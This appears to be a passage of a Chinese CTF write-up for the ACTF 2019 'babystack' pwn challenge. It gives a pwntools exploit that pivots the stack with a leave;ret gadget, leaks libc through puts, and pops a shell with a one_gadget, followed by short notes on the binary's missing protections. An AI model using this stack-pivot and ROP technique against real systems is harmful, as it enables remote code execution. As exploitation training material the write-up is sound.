exp
给出exp如下
from pwn import *
local = 0
binary = "./ACTF_2019_babystack" libc_path = '../libc-2.27.so' port = "29886"
if local == 1: p = process(binary) else: p = remote("node3.buuoj.cn",port)
def dbg(): context.log_level = 'debug'
def leak_libc(addr): global libc_base,__malloc_hook,__free_hook,system,binsh_addr,_IO_2_1_stdout_ libc = ELF(libc_path) libc_base = addr - libc.sym['puts'] print ("[*] libc base:",hex(libc_base)) __malloc_hook = libc_base + libc.sym['__malloc_hook'] system = libc_base + libc.sym['system'] __free_hook = libc_base + libc.sym['__free_hook'] _IO_2_1_stdout_ = libc_base + libc.sym['_IO_2_1_stdout_']
elf = ELF(binary) context.terminal = ['tmux','splitw','-h']
p.recvuntil(">") p.sendline(str(0xe0)) p.recvuntil("Your message will be saved at 0x") stack = int(p.recv(12),base = 16) p.recvuntil(">")
pop_rdi_ret = 0x0000000000400ad3 leave_ret = 0x0000000000400a18
payload = b'' payload = payload + p64(0) payload = payload + p64(pop_rdi_ret) payload = payload + p64(elf.got['puts']) payload = payload + p64(elf.plt['puts']) payload = payload + p64(0x4008f6) payload = payload.ljust(0xd0,b'a') payload = payload + p64(stack) payload = payload + p64(leave_ret)
p.send(payload)
leak = u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00")) leak_libc(leak) og = libc_base + 0x4f2c5
p.recvuntil(">") p.sendline(str(0xe0)) p.recvuntil(">") p.send(0xd8 * b'\x00' + p64(og))
p.interactive()
|
分析回顾栈迁移
没有开PIE保护和Canary
- IDA分析结果如下
题目给出栈地址,我们可以将栈迁移到栈上,布置gadget泄漏libc地址然后one_gadget一把梭
- 栈帧结构如下